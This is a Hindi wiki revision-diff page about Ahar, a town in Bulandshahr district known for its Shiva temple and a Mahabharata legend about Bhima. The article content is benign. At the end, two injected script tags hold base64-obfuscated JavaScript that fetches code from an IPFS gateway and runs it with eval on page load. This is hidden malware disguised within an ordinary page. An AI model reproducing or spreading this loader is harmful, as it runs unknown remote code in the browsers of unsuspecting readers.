Difference between revisions of "अहर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''अहर''' उत्तर प्रदेश के [[बुलंदशहर ज़िला|बुलंदशहर ज़...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
'''अहर''' [[उत्तर प्रदेश]] के [[बुलंदशहर ज़िला|बुलंदशहर ज़िले]] में [[गंगा नदी]] के किनारे स्थित एक छोटा-सा शहर है। यह एक ऐतिहासिक स्थान है, जिसका इतिहास [[महाभारत]] काल से मिलता है।  
+
'''अहर''' [[उत्तर प्रदेश]] के [[बुलंदशहर ज़िला|बुलंदशहर ज़िले]] में [[गंगा नदी]] के किनारे स्थित एक छोटा-सा शहर है। यह एक [[ऐतिहासिक स्थान]] है, जिसका इतिहास [[महाभारत]] काल से मिलता है।  
  
*यह प्राचीन स्थान [[अवंतिका]] और [[शिव|भगवान शिव]] के प्रचीन मंदिर के लिए जाना जाता है। वैसे इन मंदिरों में पूरे साल श्रद्धालू आते हैं, पर '[[शिवरात्रि]]' और '[[नवरात्र]]' के दौरान यहां श्रद्धालुओं की संख्या कई गुणा बढ़ जाती है।
+
*यह प्राचीन स्थान [[अवंतिका]] और [[शिव|भगवान शिव]] के प्रचीन मंदिर के लिए जाना जाता है। वैसे इन मंदिरों में पूरे साल श्रद्धालु आते हैं, पर '[[शिवरात्रि]]' और '[[नवरात्र]]' के दौरान यहां श्रद्धालुओं की संख्या कई गुणा बढ़ जाती है।
*अहर का इतिहास महाभारत काल से मिलता है। एक कथा के अनुसार [[धृतराष्ट्र]] पुत्र [[दुर्योधन]] ने [[पांडु]] पुत्र [[भीम]] को मारने के लिए उसे जहर दे दिया था। इसके बाद उन्होंने भीम को [[गंगा नदी]] में फेंक दिया, जिसमें तैरते हुए वह अहर पहुंचे। उस समय अहर पर शासन करने वाले नागवंशी शासकों ने उसे नदी से निकाला और उनका उपचार किया। इसके बाद भीम [[हस्तिनापुर]] लौट गए। यहां कुछ ऐसे सिक्के भी मिले हैं, जिसका संबंध नागवंशी काल से है।<ref>{{cite web |url= http://hindi.nativeplanet.com/bulandshahr/attractions/ahar/|title= अहर|accessmonthday= 07 जुलाई|accessyear= 2014|last= |first= |authorlink= |format= |publisher= नेटिव प्लेनेट|language= हिन्दी}}</ref>
+
*अहर का इतिहास महाभारत काल से मिलता है। एक कथा के अनुसार [[धृतराष्ट्र]] [[पुत्र]] [[दुर्योधन]] ने [[पांडु]] पुत्र [[भीम]] को मारने के लिए उसे जहर दे दिया था। इसके बाद उन्होंने भीम को [[गंगा नदी]] में फेंक दिया, जिसमें तैरते हुए वह '''अहर''' पहुंचे। उस समय अहर पर शासन करने वाले [[नाग वंश|नागवंशी]] शासकों ने उसे नदी से निकाला और उनका उपचार किया। इसके बाद भीम [[हस्तिनापुर]] लौट गए। यहां कुछ ऐसे सिक्के भी मिले हैं, जिसका संबंध नागवंशी काल से है।<ref>{{cite web |url= http://hindi.nativeplanet.com/bulandshahr/attractions/ahar/|title= अहर|accessmonthday= 07 जुलाई|accessyear= 2014|last= |first= |authorlink= |format= |publisher= नेटिव प्लेनेट|language= हिन्दी}}</ref>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 10:20, 4 May 2018

ahar uttar pradesh ke bulandashahar zile mean ganga nadi ke kinare sthit ek chhota-sa shahar hai. yah ek aitihasik sthan hai, jisaka itihas mahabharat kal se milata hai.

  • yah prachin sthan avantika aur bhagavan shiv ke prachin mandir ke lie jana jata hai. vaise in mandiroan mean poore sal shraddhalu ate haian, par 'shivaratri' aur 'navaratr' ke dauran yahaan shraddhaluoan ki sankhya kee guna badh jati hai.
  • ahar ka itihas mahabharat kal se milata hai. ek katha ke anusar dhritarashtr putr duryodhan ne paandu putr bhim ko marane ke lie use jahar de diya tha. isake bad unhoanne bhim ko ganga nadi mean pheank diya, jisamean tairate hue vah ahar pahuanche. us samay ahar par shasan karane vale nagavanshi shasakoan ne use nadi se nikala aur unaka upachar kiya. isake bad bhim hastinapur laut ge. yahaan kuchh aise sikke bhi mile haian, jisaka sanbandh nagavanshi kal se hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. ahar (hindi) netiv plenet. abhigaman tithi: 07 julaee, 2014.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>